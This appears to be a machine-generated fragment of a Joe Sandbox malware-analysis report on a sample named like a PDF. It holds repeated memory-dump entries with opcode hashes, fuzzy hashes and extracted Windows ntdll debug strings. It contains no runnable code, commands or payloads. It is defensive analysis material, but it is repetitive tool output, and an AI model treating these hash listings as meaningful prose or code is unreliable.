                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 33fb8a77a5951f85b65926136dbae489aab97423e4f053bf61d875cf233c7033
                                                                                                                                                • Instruction ID: 6d5388aff64c20cc7e318bfbdaba7055e40f76371b60f274f1f658d824cdd000
                                                                                                                                                • Opcode Fuzzy Hash: 33fb8a77a5951f85b65926136dbae489aab97423e4f053bf61d875cf233c7033
                                                                                                                                                • Instruction Fuzzy Hash: EDF08274A01248EFDB08CBA8D559A9EB7B8AF08708F400498E601EB280DAB4D940C758
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 17217d97e71d4ed1c1b9c529bb0e4baf9fcf44ac1db53dac09e61846d5f0ff91
                                                                                                                                                • Instruction ID: 5fcac3b7ec7207a6b824acce352ecc149b3b4b2b6ef493beed9b06545ccb4c7b
                                                                                                                                                • Opcode Fuzzy Hash: 17217d97e71d4ed1c1b9c529bb0e4baf9fcf44ac1db53dac09e61846d5f0ff91
                                                                                                                                                • Instruction Fuzzy Hash: 6FF08274A41248EFDB08CBA9C55AA5EB7B8AF08708F500098E502EB280D9B4D940C759
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: fa2d096ee38dc885855663d94356fc567b53af5246814ffced1637fa7db67add
                                                                                                                                                • Instruction ID: 32d79b13aa9e8a714e2d4f11973389270b4dfeaab2005caefbe3c2355d48516b
                                                                                                                                                • Opcode Fuzzy Hash: fa2d096ee38dc885855663d94356fc567b53af5246814ffced1637fa7db67add
                                                                                                                                                • Instruction Fuzzy Hash: 62E092726428216BD2115A18AC00F66739DEFE4A54F190475E544D7214DA68DD06C7E4
Memory Dump Source
• Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
• Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0395fc37f7ac1feabbfad7b7c354533df61b0b899fab89ab54543355b46bcd2c
                                                                                                                                                • Instruction ID: 5bf5c08d0387d4fa04d4a13789004739c78a4a7df57eb66d66b2cb20fe69d9dd
                                                                                                                                                • Opcode Fuzzy Hash: 0395fc37f7ac1feabbfad7b7c354533df61b0b899fab89ab54543355b46bcd2c
                                                                                                                                                • Instruction Fuzzy Hash: 32900225221100020645A95C270451B14455FD6351391D41AF1516550CD6318CA97321
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 64d96942e8e37a35ebdfd79b6588314f7d5216c99a357bf8e7375eee3bd84397
                                                                                                                                                • Instruction ID: 5f6f1f1d197b4ca96fd02762c4efb04931543f5d0e55dd709e2ae240f095cc77
                                                                                                                                                • Opcode Fuzzy Hash: 64d96942e8e37a35ebdfd79b6588314f7d5216c99a357bf8e7375eee3bd84397
                                                                                                                                                • Instruction Fuzzy Hash: 2190023160510802D650755C671475610054FD0301F51D416A0124614DD7658E9976A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 39000f4c2a6c8e19772f5a03fca82950b6c033d9b741a914235ffd78a12041e5
                                                                                                                                                • Instruction ID: 61db81ea52b0eedd8bcfa7e1a8f864fec10c905cbbda5206b202987d40bd3f7e
                                                                                                                                                • Opcode Fuzzy Hash: 39000f4c2a6c8e19772f5a03fca82950b6c033d9b741a914235ffd78a12041e5
                                                                                                                                                • Instruction Fuzzy Hash: D790023120110802D604655C6B0469610054FD0301F51D416A6124615EE6758CD57131
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 296ff1dcf03987a4e22883de1a64000840a12013a0d77c89db3f614724294f6b
                                                                                                                                                • Instruction ID: 2ccd231d955b7b1cb13107523ca42953bce259e260b97742e6a054968bb46e80
                                                                                                                                                • Opcode Fuzzy Hash: 296ff1dcf03987a4e22883de1a64000840a12013a0d77c89db3f614724294f6b
                                                                                                                                                • Instruction Fuzzy Hash: 37900261202100034605755C6714626500A4FE0201B51D426E1114550DD5358CD57125
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4192ee8eb2650646986ff78b94f7cd46397a59e374b3d6f34a553fcebcf31761
                                                                                                                                                • Instruction ID: 2c2aa9292018b6039883f2dc915a2e6f4d08b169d20807a5013bdfe73523e431
                                                                                                                                                • Opcode Fuzzy Hash: 4192ee8eb2650646986ff78b94f7cd46397a59e374b3d6f34a553fcebcf31761
                                                                                                                                                • Instruction Fuzzy Hash: B790023120514842D640755C6704A5610154FD0305F51D416A0164654DE6358D99B661
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 82440373c307af90511a61d2edf53dd491f9fffdd3747e290347206a225acd06
                                                                                                                                                • Instruction ID: af3549ffd8be0d838966f596c4b65732cf3db29acf0369a21ea0f27a4fcd6d1e
                                                                                                                                                • Opcode Fuzzy Hash: 82440373c307af90511a61d2edf53dd491f9fffdd3747e290347206a225acd06
                                                                                                                                                • Instruction Fuzzy Hash: 4790023120110802D680755C670465A10054FD1301F91D41AA0125614DDA258E9D77A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d7074dec263b23eced7f7ee14906426233117e0baa37fdad077bae536270628b
                                                                                                                                                • Instruction ID: 458f867f02a6872e3780a50a09de71adac6b0af3ed32c20b98d24fc0d431ec2f
                                                                                                                                                • Opcode Fuzzy Hash: d7074dec263b23eced7f7ee14906426233117e0baa37fdad077bae536270628b
                                                                                                                                                • Instruction Fuzzy Hash: 5490022160510402D640755C771871610154FD0201F51E416A0124514DD6698E9976A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: af94540063bfb215963cf791b69d825d93e3016c335f2f4cfc4997a0f2d86d36
                                                                                                                                                • Instruction ID: f0c4feb3611022b4546aeb9bbff34a5ab4ad7a7ece268625e8894c7fd04cc550
                                                                                                                                                • Opcode Fuzzy Hash: af94540063bfb215963cf791b69d825d93e3016c335f2f4cfc4997a0f2d86d36
                                                                                                                                                • Instruction Fuzzy Hash: 7A90023120110402D600699C770865610054FE0301F51E416A5124515ED6758CD57131
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4b36ca41cf813aa5168b3b966757be9b7fe3472340244908de4ab62bb60a51fc
                                                                                                                                                • Instruction ID: 8586b603c7c1cd3524878961a370a9062f8fb4816f66432e1b79412f393573fa
                                                                                                                                                • Opcode Fuzzy Hash: 4b36ca41cf813aa5168b3b966757be9b7fe3472340244908de4ab62bb60a51fc
                                                                                                                                                • Instruction Fuzzy Hash: 5D90023120110842D600655C6704B5610054FE0301F51D41BA0224614DD625CC957521
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 54ecc47e8a0ec7fdeb3d0bbbbbd73e31427c62f840ed664e9eb8cb6323f6a6b4
                                                                                                                                                • Instruction ID: 61dd6db7db85af66307866b4fe3e5ad9537c697a68b730de4dde8c3f7f08d76d
                                                                                                                                                • Opcode Fuzzy Hash: 54ecc47e8a0ec7fdeb3d0bbbbbd73e31427c62f840ed664e9eb8cb6323f6a6b4
                                                                                                                                                • Instruction Fuzzy Hash: 0290022124515102D650755C670462650056FE0201F51D426A0914554DD5658C997221
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 79eeda79214605ca1c21e3a6d5e34f035b1f6d65265065e8a20afd1d5dfcc9eb
                                                                                                                                                • Instruction ID: 3d2770a6929ef56cbf548ea2f8aa5175f085a5891189555aa2164f3011c8568f
                                                                                                                                                • Opcode Fuzzy Hash: 79eeda79214605ca1c21e3a6d5e34f035b1f6d65265065e8a20afd1d5dfcc9eb
                                                                                                                                                • Instruction Fuzzy Hash: 13900225211100030605A95C270451710464FD5351351D426F1115510CE6318CA57121
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4f7e3b9359dadec8a764cd0db6bb201baa97f83079c9d694f617699eea383437
                                                                                                                                                • Instruction ID: 60466c337e37df3e5fd181479c6eb584a339a9e30928cc7e3ad7bc241663a7db
                                                                                                                                                • Opcode Fuzzy Hash: 4f7e3b9359dadec8a764cd0db6bb201baa97f83079c9d694f617699eea383437
                                                                                                                                                • Instruction Fuzzy Hash: 169002A1201240924A00A65CA704B1A55054FE0201B51D41BE1154520CD5358C95B135
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 68f2c68a02a5b5d19e6e2d6dd2b4db924a76b8993b72ef6bb4dccfd7f9a021ca
                                                                                                                                                • Instruction ID: b95339aa085df1b20a5c3fd2f636c86149bb35e5d38403401ba882f8b1f22129
                                                                                                                                                • Opcode Fuzzy Hash: 68f2c68a02a5b5d19e6e2d6dd2b4db924a76b8993b72ef6bb4dccfd7f9a021ca
                                                                                                                                                • Instruction Fuzzy Hash: 0490026134110442D600655C6714B1610058FE1301F51D41AE1164514DD629CC967126
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 741665e1b9baea8d64530ab41a6ffc95d97c18c4f5011697765c23fdd7d46e54
                                                                                                                                                • Instruction ID: 3c4c9745bee27c2ec1ec3e3d0b84d87119be94acacc0fb8936d2f381b8d7d6d3
                                                                                                                                                • Opcode Fuzzy Hash: 741665e1b9baea8d64530ab41a6ffc95d97c18c4f5011697765c23fdd7d46e54
                                                                                                                                                • Instruction Fuzzy Hash: 9B900261601200424640755C6B0441670055FE1301391D51AA0654520CD6288C99B269
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                                                                                                                                • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                                                                                                                                • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: HEAP:
                                                                                                                                                • API String ID: 3446177414-2466845122

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 326877DD, 32687802
                                                                                                                                                • SsHd, xrefs: 3263A304
                                                                                                                                                • Actx , xrefs: 32687819, 32687880
                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32687807
                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326877E2
                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 326878F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                • API String ID: 0-1988757188

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3268914E, 32689173
                                                                                                                                                • Actx , xrefs: 32689315
                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32689178
                                                                                                                                                • GsHd, xrefs: 3263D794
                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32689153
                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32689372
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                • Opcode ID: d2194278d195ca2bd72ca7907d32e57173fae04ca228255302a12a752a4e0edb
                                                                                                                                                • Instruction ID: 83030e7352c2dcf1e9f5d7bdee664ee4865daee07e6407ef652e35afd91cf20d
                                                                                                                                                • Opcode Fuzzy Hash: d2194278d195ca2bd72ca7907d32e57173fae04ca228255302a12a752a4e0edb
                                                                                                                                                • Instruction Fuzzy Hash: 44E1A07460A341DFE705CF24C880B5AB7F4BF88758F404A6DEA958B392DB71E944CB92

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                • Opcode ID: 86c869d05e28b936398fbd926cda4bee7ac83dff17fcc667536ad6550a32b705
                                                                                                                                                • Instruction ID: 366df79d890aff639c44dafdd87aedfed63f0aa3cc915f9a55947199d24102d2
                                                                                                                                                • Opcode Fuzzy Hash: 86c869d05e28b936398fbd926cda4bee7ac83dff17fcc667536ad6550a32b705
                                                                                                                                                • Instruction Fuzzy Hash: 7D416BB9A01209EBDB05CF98C980AEEBBB9FF48754F114169ED04B7350DB71AE41DB90
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32679885
                                                                                                                                                • LdrpLoadShimEngine, xrefs: 3267984A, 3267988B
                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 32679854, 32679895
                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32679843
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                • Opcode ID: d74998dacf3a797b8269fec84aa9bc4d9e246f1a5ee7c7c7f1aed1e0281a52e1
                                                                                                                                                • Instruction ID: bf3d358e2d8612487a0c6e337366419b4b52cb9630d0a8d4775582e1ef36f8d2
                                                                                                                                                • Opcode Fuzzy Hash: d74998dacf3a797b8269fec84aa9bc4d9e246f1a5ee7c7c7f1aed1e0281a52e1
                                                                                                                                                • Instruction Fuzzy Hash: 0A51017AA013549FEB08DBA8C894F9D77A6BF48314F140569E541BF295CBB0BC82CB85
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                • Opcode ID: 0e8ccd439ad5c2389fd509a5b8302031d20fe797e382d753bc188e459efc1cd6
                                                                                                                                                • Instruction ID: e302e87d16dbf4cca1c004be7e6fa3bd4c19eb378a04b6f268cd27b4f8aaeb8b
                                                                                                                                                • Opcode Fuzzy Hash: 0e8ccd439ad5c2389fd509a5b8302031d20fe797e382d753bc188e459efc1cd6
